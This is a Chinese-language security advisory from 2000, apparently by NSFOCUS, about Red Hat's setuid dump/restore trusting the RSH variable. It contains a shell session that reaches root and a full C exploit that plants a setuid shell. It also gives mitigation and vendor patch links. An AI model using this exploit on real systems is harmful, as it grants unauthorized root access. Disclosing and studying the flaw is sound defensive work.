首页 -> 安全研究
安全研究
安全漏洞
Redhat dump/restore 命令执行任意外部命令漏洞
发布日期:2000-11-02
更新日期:2000-11-03
受影响系统:
不受影响系统:
dump-0.4b15-1
- Red Hat Linux 6.2 (i386, alpha, sparc)
- Red Hat Linux 6.2EE (i386, alpha, sparc)
+ Red Hat Linux 5.2 (i386, alpha, sparc)
描述:
dump-0.4b4-11
- RedHat Linux 6.1
dump-0.4b19-4
- RedHat Linux 7
rpm -qf /sbin/dump,如果是dump-0.4b15-1,该版本的dump/restore命令存在一个
设计上的错误。在做远程备份时,本来应该是/usr/bin/rsh之类的值,由于没有检查
RSH环境变量的有效性,恶意的本地用户可以指定该值为自己编写的shell script,
由于dump/restore是setuid-to-root的,于是该脚本以root身份被执行,进而很容易
获取root权限。
根据NSFOCUS安全小组测试,该漏洞对于RedHat Linux 6.1携带的dump-0.4b4-11无效。
<* 来源:JW Oh (mat@hacksware.com)
Claes Nyberg (md0claes@mdstud.chalmers.se)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
[mat@localhost mat]$ export TAPE=garbage:garbage
[mat@localhost mat]$ export RSH=/home/mat/execute_this
[mat@localhost mat]$ cat > /home/mat/execute_this
#!/bin/sh
cp /bin/sh /home/mat/sh
chmod 4755 /home/mat/sh
[mat@localhost mat]$ chmod 755 /home/mat/execute_this
[mat@localhost mat]$ /sbin/dump -0 /
DUMP: Connection to garbage established.
DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000
DUMP: Date of last level 0 dump: the epoch
DUMP: Dumping /dev/hda2 (/) to garbage on host garbage
DUMP: Label: none
/dev/hda2: Permission denied while opening filesystem
[mat@localhost mat]$ ls -la /home/mat/sh
-rwsr-xr-x 1 root tty 316848 Oct 31 14:38 /home/mat/sh
[mat@localhost mat]$ /home/mat/sh
bash# id
uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat)
Claes Nyberg (md0claes@mdstud.chalmers.se)发现restore
也存在同样的问题,并提供了一个测试程序:
-- begin ---
/*
**
** dump-0.4b15x.c
**
** dump-0.4b15 exploit:
** Redhat 6.2 dump command executes
** external program with suid priviledge.
**
** affected:
** /sbin/dump
** /sbin/dump.static
** /sbin/restore
** /sbin/restore.static
**
** Bug found by mat@hacksware.com
**
** This example was coded by md0claes@mdstud.chalmers.se
** It was written for EDUCATIONAL PURPOSES ONLY.
**
**
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define RUNME "/tmp/runme" /* tmp file */
#define SUID_PATH "/tmp/superdude" /* the power of root */
void usage(char *pname)
{
fprintf(stdout, "\nUsage: %s < d | s | r | p >\n\n", pname);
fprintf(stdout, " d - exploit /sbin/dump\n");
fprintf(stdout, " s - exploit /sbin/dump.static\n");
fprintf(stdout, " r - exploit /sbin/restore\n");
fprintf(stdout, " p - exploit /sbin/restore.static\n\n");
}
int main(int argc, char *argv[], char *envp[])
{
int fd;
pid_t pid;
char *bad_env[] = { "TAPE=garbage:garbage", "RSH="RUNME };
char runbuf[] = { "#!/bin/sh\n/bin/cp /bin/bash "
SUID_PATH "\nchmod 6755 " SUID_PATH };
char *suid[] = { SUID_PATH, NULL };
char *av[] = { "/sbin/restore.static", "restore.static",
"-t", "/tmp/foo" };
if (argc != 2) {
usage(argv[0]);
exit(1);
}
switch(tolower(argv[1][0])) {
case 'd':
av[0] = "/sbin/dump";
av[1] = "dump";
av[2] = "-0";
av[3] = "/";
break;
case 's':
av[0] = "/sbin/dump.static";
av[1] = "dump.static";
av[2] = "-0";
av[3] = "/";
break;
case 'r':
av[0] = "/sbin/restore";
av[1] = "restore";
break;
case 'p':
break;
default:
usage(argv[0]);
exit(1);
}
if ((fd = open(RUNME,O_WRONLY|O_CREAT|O_TRUNC, 0755)) == -1) {
perror("fopen");
exit(1);
}
if (write(fd, runbuf, sizeof(runbuf)) == -1) {
perror("write");
exit(1);
}
close(fd);
if ((pid = fork()) < 0) {
perror("fork");
exit(1);
}
else if (pid == 0) {
if (execle(av[0], av[1], av[2], av[3], NULL, bad_env) < 0) {
perror("execle");
_exit(1);
}
}
sleep(1);
unlink(RUNME);
fprintf(stdout, "\nExploited %s \n", av[0]);
fprintf(stdout, "Running " SUID_PATH "\n");
execve(SUID_PATH, suid, envp);
exit(0);
}
建议:
在厂商没有提供补丁之前,Nsfocus建议您卸掉这些程序的setuid位:
chmod a-s /sbin/dump
chmod a-s /sbin/dump.static
chmod a-s /sbin/restore
chmod a-s /sbin/restore.static
厂商补丁:
RedHat建议安装RedHat 7.0所带的dump软件包,它解决了这个问题:
[ Red Hat Linux 5.2 ]:
alpha:
ftp://updates.redhat.com/5.2/alpha/dump-0.4b19-5.5x.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/dump-static-0.4b19-5.5x.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/rmt-0.4b19-5.5x.alpha.rpm
sparc:
ftp://updates.redhat.com/5.2/sparc/dump-0.4b19-5.5x.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/dump-static-0.4b19-5.5x.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/rmt-0.4b19-5.5x.sparc.rpm
i386:
ftp://updates.redhat.com/5.2/i386/dump-0.4b19-5.5x.i386.rpm
ftp://updates.redhat.com/5.2/i386/dump-static-0.4b19-5.5x.i386.rpm
ftp://updates.redhat.com/5.2/i386/rmt-0.4b19-5.5x.i386.rpm
sources:
ftp://updates.redhat.com/5.2/SRPMS/dump-0.4b19-5.5x.src.rpm
[ Red Hat Linux 6.2 ]:
alpha:
ftp://updates.redhat.com/6.2/alpha/dump-0.4b19-5.6x.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/dump-static-0.4b19-5.6x.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/rmt-0.4b19-5.6x.alpha.rpm
sparc:
ftp://updates.redhat.com/6.2/sparc/dump-0.4b19-5.6x.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/dump-static-0.4b19-5.6x.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/rmt-0.4b19-5.6x.sparc.rpm
i386:
ftp://updates.redhat.com/6.2/i386/dump-0.4b19-5.6x.i386.rpm
ftp://updates.redhat.com/6.2/i386/dump-static-0.4b19-5.6x.i386.rpm
ftp://updates.redhat.com/6.2/i386/rmt-0.4b19-5.6x.i386.rpm
sources:
ftp://updates.redhat.com/6.2/SRPMS/dump-0.4b19-5.6x.src.rpm
浏览次数:7332
严重程度:0(网友投票)
绿盟科技给您安全的保障